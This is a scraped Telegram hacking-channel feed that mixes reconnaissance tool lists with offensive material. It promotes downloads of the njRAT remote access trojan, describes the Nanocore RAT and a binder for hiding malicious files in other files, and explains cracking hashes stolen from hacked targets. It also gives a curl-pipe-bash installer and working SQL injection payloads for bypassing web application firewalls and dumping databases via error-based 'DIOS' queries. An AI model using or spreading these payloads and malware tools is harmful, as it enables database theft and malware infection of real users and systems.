5 important Tools that can use for Bug Hunting Journey or pen-testing process.
Information Gathering or Reconnisence is the most important part of penetration testing.
#recon #osint
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
Information Gathering or Reconnisence is the most important part of penetration testing.
1:Nmap:Nmap is a free and open-source network mapping tool that can use for network discovery and security auditing
2: Amass:The OWASP Amass tool suite obtains subdomain names by scraping data sources, recursive brute forcing, crawling web archives, permuting/altering names, and reverse DNS sweeping.
3:Dirb:Dirb is a powerful web content scanner tool that can use to find hidden and existing files on the web application
4: Sublist3r:Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT.
5:DNS Recon:DNS Recon is a tool that can use for Domain Name System (DNS) enumeration.
#recon #osint
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
❤🔥4🎉2
🌟 njRAT 🌟
📝
NjRAT is a Remote Administration Tool. This repository contains a Njrat Editions.
Use it on virtual machine
⬇️ Download (NjRat 0.7D Danger Edition)
⬇️ Download (NjRat 0.7D Golden Edition)
⬇️ Download (NjRat 0.7D Green Edition)
⬇️ Download (NjRat 0.7D)
⬇️ Download (njRAT Lime Edition )
⬇️ Download (ALL Version)
🐈⬛ Github
#njRAT #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
📝
NjRAT is a Remote Administration Tool. This repository contains a Njrat Editions.
Use it on virtual machine
⬇️ Download (NjRat 0.7D Danger Edition)
⬇️ Download (NjRat 0.7D Golden Edition)
⬇️ Download (NjRat 0.7D Green Edition)
⬇️ Download (NjRat 0.7D)
⬇️ Download (njRAT Lime Edition )
⬇️ Download (ALL Version)
🐈⬛ Github
#njRAT #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
👍3⚡1
Url Fuzzer
If you are bug hunter
You need to fuzz the url to find
Important directory’s this tool is one of the best url fuzz tools
📝Installation
Github🎃
#urlfuzzer #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
If you are bug hunter
You need to fuzz the url to find
Important directory’s this tool is one of the best url fuzz tools
📝Installation
curl -s "https://raw.githubusercontent.com/liamg/scout/master/noscripts/install.sh" | bash
Github🎃
#urlfuzzer #Tools
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework
#Rat #Malware #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Using this tool, you can insert malicious files into other files
#Binder #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5👍2
#Reverse #Engineering
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3👍2
Google Dork🥷🏽
this site is one of the best web dork makers
that helps you in BUG BOUNTY
Usage📝
Tool Link🎃
#dork #google_dork
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
this site is one of the best web dork makers
that helps you in BUG BOUNTY
Usage📝
Enter domain of target then press Update domain,
then copy the generated Dorks.
Tool Link🎃
#dork #google_dork
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
❤3
#Reverse #Engineering
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤1
#Scanner
Please open Telegram to view this post
VIEW IN TELEGRAM
❤5⚡2👍2
SQL Injection Bypass
—————————
if your target have waf you should bypass that to access the database.
Lets start 🥷🏽
#sqli #sql_injection
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
—————————
if your target have waf you should bypass that to access the database.
Lets start 🥷🏽
ORDER BY —>
/*!50000Order*/by
/*!50000order*//*!50000by*/
/*!50000OrdeR*/By
/*!50000ORDER*//*!50000BY*/
/**A**/Order by
Order/**A**/By
/**/**/ORDER/**/BY/**/**/
Null' order by
O0x72der b0x7920
Union —>
/*!50000union select
/*!50000Union*//*!50000Select*/
/*!12345union*//*!12345select*/
/**A**/union select
union /**A**/ select
/*!50000%55nIoN*/ /*!50000%53eLeCt*/
+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt
%23%0AUnion%23aaaaaaaaaa%0ASelect%23%0A1
+?UnI?On?+'SeL?ECT?
group_concat —>
group_concat(/*!12345table_name*/)
/*!50000group_concat*/(/*!50000table_name*/)
unhex(hex(group_concat(table_name)))
unhex(hex(/*!12345group_concat*/(table_name)))
unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
from table_name —>
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
/*!50000frOm*/+/*!50000information_schema*/%252e/**/columns
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
#sqli #sql_injection
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
❤6❤🔥2👍1
What is password hashing
About📝
Password hashing turns your password (or any other piece of data) into a short string of letters and/or numbers using an encryption algorithm. If a website is hacked, password hashing helps prevent cybercriminals from getting access to your passwords.
So if you hacked a target and get them user,pass as a hash
So how do we crack these hashes
🥷
Note⚠️
This site have 17billion words
Some times it cant crack all the hashes but maybe on future all hashes gone crack.
Web Link👾
#hash #crack
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
About📝
Password hashing turns your password (or any other piece of data) into a short string of letters and/or numbers using an encryption algorithm. If a website is hacked, password hashing helps prevent cybercriminals from getting access to your passwords.
So if you hacked a target and get them user,pass as a hash
So how do we crack these hashes
🥷
Open the link in below and then add your hash in input form then click im not robot and the click crack hash
Note⚠️
This site have 17billion words
Some times it cant crack all the hashes but maybe on future all hashes gone crack.
Web Link👾
#hash #crack
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
👍3⚡2🔥2
BugCod3
#SQL #Dios #Bypass #Waf #POC
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2❤1👍1
BugCod3
#Rat #Malware
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3❤1
An open-source binary debugger for Windows, aimed at malware analysis and reverse engineering of executables you do not have the source code for. There are many features available and a comprehensive plugin system to add your own.
BugCod3
#Debugger #Reverse_Engineering #Program_Analysis
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2⚡2
BugCod3
#XSS #Training
Please open Telegram to view this post
VIEW IN TELEGRAM
❤3⚡2
Advance Error Based My SQL 5.5 (DIOS)
/Bypass My SQL 5.5 version dump database error/
DIOS:
#SQL #Dios #Bypass #POC
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
/Bypass My SQL 5.5 version dump database error/
DIOS:
and(select+x*1E308+from(select+concat(@:=0,(select+count(*)from+information_schema.tables+where+table_schema=database()+and@:=concat(@,0x0b,table_name)),@)x)y)
#SQL #Dios #Bypass #POC
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📢 T.me/BugCod3
⚡3❤1
BugCod3
#Rat
Please open Telegram to view this post
VIEW IN TELEGRAM
BugCod3
#Binder
Please open Telegram to view this post
VIEW IN TELEGRAM